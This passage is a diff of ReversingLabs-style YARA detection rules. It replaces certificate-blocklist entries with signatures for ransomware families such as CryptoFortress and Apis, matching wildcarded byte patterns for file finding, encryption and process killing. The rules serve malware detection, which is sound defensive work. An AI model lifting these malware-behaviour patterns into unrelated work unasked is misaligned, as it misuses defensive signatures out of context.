+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 4C
+            8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89 4C 24 ?? 41 B9 ??
+            ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ??
+            8B 85 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 C0 48 69 F0 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF
+            D0 49 89 F0 BA ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ??
+            48 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 4C 8B 8D ?? ??
+            ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89 4C 24
+        }
+		$kill_file_processes_p2 = {
+            89 C1 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 85 ?? ?? ?? ??
+            85 C0 75 ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8B 95 ?? ?? ?? ?? 49 89 D0 BA ?? ?? ?? ??
+            48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ??
+            ?? ?? E9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0
+            89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48
+            98 48 69 D0 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 01 D0 8B 00 39 85 ?? ?? ?? ?? 75 ??
+            48 8B 05 ?? ?? ?? ?? FF D0 48 8B 95 ?? ?? ?? ?? 49 89 D0 BA ?? ?? ?? ?? 48 89 C1 48
+            8B 05 ?? ?? ?? ?? FF D0 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 69 D0 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 01 D0
+            8B 00 41 89 C0 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ??
+            ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 85 ?? ?? ?? ??
+            41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ??
+            ?? ?? ?? FF D0 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48
+            8D 55 ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1
+            E8 ?? ?? ?? ?? 48 8D 45 ?? 49 C7 C0 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C0 ?? 48 63 C8 48 8D 45 ?? 48 8D 55
+            ?? 49 C7 C1 ?? ?? ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 85 ?? ??
+            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OLIMP STROI, OOO" and pe.signatures [ i ] . serial == "69:09:10:dc:89:d7:85:7c:35:00:fb:74:be:d2:b0:8d" and 1597276800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $check_processes ) and ( all of ( $kill_file_processes_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Fd41E6Bd7428D3008C8A05F68C9Ac6F2 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cryptofortress : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects CryptoFortress ransomware."
 		author = "ReversingLabs"
-		id = "ef59a76a-3b59-55a2-9da5-c3ba844bbe77"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "460289b1-f775-5e0b-8c44-4f6e5c92da60"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5500-L5518"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e387664dc9aa746e127b4efb2ef43675f8fb6df66e99d33ef765e8fa306a4f18"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.CryptoFortress.yara#L1-L162"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "474893b63523de5ff9eb8a0c91b0677b99ce65056af7f5d02a73e43fa65453c9"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "CryptoFortress"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$enum_drives = {
+            55 8B EC 83 C4 ?? 56 57 C7 45 ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 8D 7D ?? B2 ?? B9 ?? ?? ?? ?? A9 ?? ?? ?? ?? 74 ?? 88 17 47 D1 E8 FE C2 49
+            75 ?? C6 07 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F8 8D 75 ?? 8A 16 88 55 ?? 8D 45 ?? 50
+            FF 15 ?? ?? ?? ?? 8D 55 ?? C6 42 ?? ?? 83 F8 ?? 75 ?? 60 8D 45 ?? 50 8D 45 ?? 50 6A
+            ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ??
+            50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 05 ?? ?? ?? ?? 61 46 4F 75 ?? A1 ?? ?? ?? ?? A3
+            ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 5F 5E C9 C3
+        }
+		$enum_shared_resources = {
+            55 8B EC 83 C4 ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 0B C0 0F
+            85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? 8D 45 ?? 50 FF 75 ?? FF 15
+            ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 3D ?? ?? ?? ?? 74 ?? 8B 4D ?? 51 8D 49 ?? 6B C9 ?? 8B
+            45 ?? 8D 0C 01 6A ?? 51 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? FF 75 ?? E8 ??
+            ?? ?? ?? 83 F8 ?? 76 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            0B C0 74 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 49 75 ?? EB
+            ?? EB ?? E9 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? FF
+            15 ?? ?? ?? ?? C9 C2
+        }
+		$find_files = {
+            55 8B EC 81 C4 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 40 0F 84 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            83 E0 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
+            0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? C6 00 ?? 2B 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            8D ?? ?? ?? ?? C7 04 08 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 8B 8D ?? ?? ?? ?? C7 44 08 ??
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
+            0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F
+            85 ?? ?? ?? ?? 8B 4D ?? 0B C9 75 ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 45 ??
+            8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 49 8B 1D ?? ?? ?? ?? 51 53
+            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 59 EB ?? 53 E8 ?? ?? ?? ?? 03 D8
+            83 C3 ?? 59 E2 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 8B 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 0B
+            C9 75 ?? 3B D0 72 ?? EB ?? EB ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C9 C3
+        }
+		$encrypt_files = {
+            55 8B EC 83 C4 ?? 53 33 C0 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89
+            45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? FF 35 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 89 45 ?? FF 75 ?? E8 ?? ?? ?? ?? 33 C0 50 50 6A ?? 50 6A ?? 68 ?? ?? ?? ??
+            FF 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 8D 45
+            ?? 50 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
+            83 7D ?? ?? 75 ?? 83 7D ?? ?? 73 ?? E9 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? BB ?? ?? ?? ??
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? BB ?? ?? ?? ?? B8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B D2 75 ?? 0B C9 75 ?? B9 ?? ?? ?? ?? 89 4D ?? 89 55 ??
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 4D ?? 89 55 ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 89 4D ?? 89 55 ?? 0B DB 75 ?? 0B C0 74 ?? 83 45 ?? ?? 83 55 ?? ?? FF 75 ??
+            FF 75 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? ??
+            ?? ?? 76 ?? B8 ?? ?? ?? ?? EB ?? 8B 45 ?? 6B C0 ?? 89 45 ?? 6A ?? 8D 45 ?? 50 FF 75
+            ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? E9 ?? ?? ?? ??
+            6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? E8 ?? ??
+            ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF
+            75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? DF 6D ?? DA 45
+            ?? DF 7D ?? C7 45 ?? ?? ?? ?? ?? DF 6D ?? DA 65 ?? DF 7D ?? C7 45 ?? ?? ?? ?? ?? DF
+            6D ?? DA 65 ?? DF 7D ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 74 ?? E9 ?? ?? ?? ?? 8F 45 ??
+            8F 45 ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ??
+            ?? ?? 0B C0 74 ?? EB ?? 6A ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ??
+            ?? 0B C0 75 ?? EB ?? 6A ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
+            ?? 0B C0 75 ?? EB ?? EB ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 FF 75 ?? FF 15 ?? ??
+            ?? ?? FF 75 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ??
+            50 FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B C9 C2
+        }
+		$read_config_file = {
+            55 8B EC 83 C4 ?? [0-20] 6A ?? 68 ?? ?? ?? ?? 6A
+            ?? (E8 | FF 15) ?? ?? ?? ?? 0B C0 75 ?? 33 C0 C9
+            C3 89 45 ?? 50 6A ?? (E8 | FF 15) ?? ?? ?? ?? 0B
+            C0 75 04 33 C0 C9 C3 89 45 ?? FF 75 ?? 6A ??
+            (E8 | FF 15) ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3
+            89 45 ?? 50 (E8 | FF 15) ?? ?? ?? ?? 0B C0 75 04
+            33 C0 C9 C3 89 45 ?? FF 75 ?? 6A ?? (E8 | FF 15)
+            ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? 8B
+            D8 FF 75 ?? FF 75 ?? FF 75 ?? (E8 | FF 15) ?? ??
+            ?? ?? FF 75 ?? (E8 | FF 15) ?? ?? ?? ?? 8B 5D ??
+            6A ?? 53 68 ?? ?? ?? ?? (E8 | FF 15) ?? ?? ?? ??
+            83 C3 ?? 8B 45 ?? 83 (E8 | FF 15) ?? 50 53
+            (E8 | FF 15) ?? ?? ?? ?? 8A 03 A2 ?? ?? ?? ?? 83
+            C3 ?? 8A 03 A2 ?? ?? ?? ?? 83 C3
+        }
+		$file_type_loop = {
+            51 53 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8
+            ?? 75 03 59 EB ?? 53 E8 ?? ?? ?? ?? 03 D8 83 C3
+            ?? 59 E2 DC [20-40] FF B5 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 0B C0 75 44 FF B5 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 85
+        }
+		$encrypt_routine = {
+            FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
+            [0-10] E9 ?? ?? ?? ?? 6A ?? [1-10] FF 75 ??
+            FF (35 | 75) [1-4] FF 75 ?? (E8 | FF 15)
+            ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? [1-10] FF (35 | 75) [1-4] 6A ??
+            6A ?? 6A ?? FF 35 ?? ?? ?? ?? (E8 | FF 15) ??
+            ?? ?? ?? 0B C0 75 ?? (EB | E9) [1-4] 6A ??
+            [2-10] FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8
+            ?? 75 ?? [10-40] FF (35 | 75) [1-4] FF 75 ??
+            (E8 |FF 15)
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OM-FAS d.o.o." and ( pe.signatures [ i ] . serial == "00:fd:41:e6:bd:74:28:d3:00:8c:8a:05:f6:8c:9a:c6:f2" or pe.signatures [ i ] . serial == "fd:41:e6:bd:74:28:d3:00:8c:8a:05:f6:8c:9a:c6:f2" ) and 1575590400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $read_config_file and $file_type_loop and $encrypt_routine ) or ( $enum_drives and $enum_shared_resources and $find_files and $encrypt_files ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_C7079866C0E48B01246Ba0C148E70D4D : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Apis : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Apis ransomware."
 		author = "ReversingLabs"
-		id = "2c985bd9-cb2a-553a-af63-a2a0a80cc641"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "63791250-e21e-53d1-932c-9b5d16a7cad9"
+		date = "2021-11-25"
+		modified = "2021-11-25"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5520-L5538"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cc144760e0ca21fd98b55ac222db540900def61f54e9644f8cab5f711ec7bf24"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.Apis.yara#L1-L75"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0915469884a268f124da348d6a182eb4a0f69063d4041b46628794ab011227ef"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Apis"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 0A 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 2C ?? 06 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E
+            69 32 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 7E ?? ?? ?? ??
+            7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
+            ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E
+            ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ??
+            7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 07 28 ?? ??
+            ?? ?? 08 28 ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11
+            ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ??
+            28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 2A
+        }
+		$encrypt_files = {
+            02 28 ?? ?? ?? ?? 0A 17 0B 16 0C 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 06 08 9A 28
+            ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 08 9A 28 ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 11 ?? FE 06 ?? ??
+            ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 39
+            ?? ?? ?? ?? 06 08 9A 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 6F
+            ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 2F ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ??
+            18 5B 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 06 08 9A 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            06 08 9A 06 08 9A 72 ?? ?? ?? ?? 1A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2B ??
+            28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 1A 5B 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            13 ?? 06 08 9A 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 08 9A 06 08 9A 72 ?? ?? ?? ?? 1A
+            28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 2C ?? 16 0B 02 72 ?? ?? ?? ?? 7E ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 08 17 58 0C 08 06 8E
+            69 3F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 28 ?? ?? ?? ??
+            11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 2A
+        }
+		$setup_env = {
+            28 ?? ?? ?? ?? 2C ?? 17 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
+            ?? 2C ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
+            ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2B ?? 7E ?? ?? ?? ?? 2C ??
+            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ??
+            28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2D ?? 14 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ??
+            80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 7E ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A
+        }
+
 	condition:
